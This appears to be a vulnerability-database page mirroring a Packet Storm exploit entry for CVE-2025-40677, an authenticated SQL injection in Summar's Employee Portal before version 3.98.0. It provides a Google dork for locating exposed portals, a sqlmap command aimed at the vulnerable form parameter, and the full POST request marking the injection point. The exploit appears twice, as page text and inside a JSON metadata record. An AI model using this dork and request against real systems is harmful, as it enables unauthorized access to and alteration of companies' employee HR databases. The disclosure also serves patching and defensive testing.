📄 Summer Employee Portal SQL Injection_PACKETSTORM:209771

8.7 / 10

HIGH

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N

Description

Summer.......................................

Visit Original Source

Basic Information

ID PACKETSTORM:209771

Published Sep 23, 2025 at 00:00

Affected Product

Affected Versions # Exploit Title: Summar Employee Portal Prior to 3.98.0 Authenticated SQL Injection - CVE-2025-40677
# Google Dork: inurl:"/MemberPages/quienesquien.aspx"
# Date: 09/22/2025
# Exploit Author: Peter Gabaldon - https://pgj11.com/
# Vendor Homepage: https://www.summar.es/
# Software Link: https://www.summar.es/software-recursos-humanos/
# Version: < 3.98.0
# Tested on: Kali
# CVE : CVE-2025-40677
# Description: SQL injection vulnerability in Summar Software´s Portal del Empleado. This vulnerability allows an attacker to retrieve, create, update, and delete the database by sending a POST request using the parameter “ctl00$ContentPlaceHolder1$filtroNombre” in “/MemberPages/quienesquien.aspx”.

```
$ sqlmap --random-agent -r req.sqli.xml -p 'ctl00%24ContentPlaceHolder1%24filtroNombre' --dbms="MSSQL"

POST /MemberPages/quienesquien.aspx HTTP/1.1
Host: [REDACTED]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
X-Microsoftajax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24ContentPlaceHolder1%24lnkVerTrabajador&ctl00%24ContentPlaceHolder1%24filtroNombre=[SQL_INJECTION_POINT]&ctl00%24ContentPlaceHolder1%24ddlEmpresa=&ctl00%24ContentPlaceHolder1%24filtroCentro=&ctl00%24ContentPlaceHolder1%24filtroUO=&ctl00%24ContentPlaceHolder1%24filtroPuesto=&__EVENTTARGET=ctl00%24ContentPlaceHolder1%24lnkVerTrabajador&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=...&__VIEWSTATEGENERATOR=...&__ASYNCPOST=true&
```

{
    "lastseen": "2025-09-23T17:00:14",
    "description": "Summer.......................................",
    "published": "2025-09-23T00:00:00",
    "modified": "2025-09-23T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Summer Employee Portal SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:209771",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-40677"
    ],
    "sourceData": "# Exploit Title: Summar Employee Portal Prior to 3.98.0 Authenticated SQL Injection - CVE-2025-40677\n    # Google Dork: inurl:\"/MemberPages/quienesquien.aspx\"\n    # Date: 09/22/2025\n    # Exploit Author: Peter Gabaldon - https://pgj11.com/\n    # Vendor Homepage: https://www.summar.es/\n    # Software Link: https://www.summar.es/software-recursos-humanos/\n    # Version: < 3.98.0\n    # Tested on: Kali\n    # CVE : CVE-2025-40677\n    # Description: SQL injection vulnerability in Summar Software\u00b4s Portal del Empleado. This vulnerability allows an attacker to retrieve, create, update, and delete the database by sending a POST request using the parameter \u201cctl00$ContentPlaceHolder1$filtroNombre\u201d in \u201c/MemberPages/quienesquien.aspx\u201d.\n    \n    ```\n    $ sqlmap --random-agent -r req.sqli.xml -p 'ctl00%24ContentPlaceHolder1%24filtroNombre' --dbms=\"MSSQL\"\n    \n    POST /MemberPages/quienesquien.aspx HTTP/1.1\n    Host: [REDACTED]\n    Cookie: [REDACTED]\n    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0\n    Accept: */*\n    Accept-Language: en-US,en;q=0.5\n    Accept-Encoding: gzip, deflate, br\n    X-Requested-With: XMLHttpRequest\n    X-Microsoftajax: Delta=true\n    Cache-Control: no-cache\n    Content-Type: application/x-www-form-urlencoded; charset=utf-8\n    Sec-Fetch-Dest: empty\n    Sec-Fetch-Mode: cors\n    Sec-Fetch-Site: same-origin\n    Te: trailers\n    Connection: keep-alive\n     \n    ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24ContentPlaceHolder1%24lnkVerTrabajador&ctl00%24ContentPlaceHolder1%24filtroNombre=[SQL_INJECTION_POINT]&ctl00%24ContentPlaceHolder1%24ddlEmpresa=&ctl00%24ContentPlaceHolder1%24filtroCentro=&ctl00%24ContentPlaceHolder1%24filtroUO=&ctl00%24ContentPlaceHolder1%24filtroPuesto=&__EVENTTARGET=ctl00%24ContentPlaceHolder1%24lnkVerTrabajador&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=...&__VIEWSTATEGENERATOR=...&__ASYNCPOST=true&\n    ```",
    "sourceHref": "https://packetstorm.news/download/209771",
    "cvss": {
        "score": 8.7,
        "severity": "HIGH",
        "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/209771/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply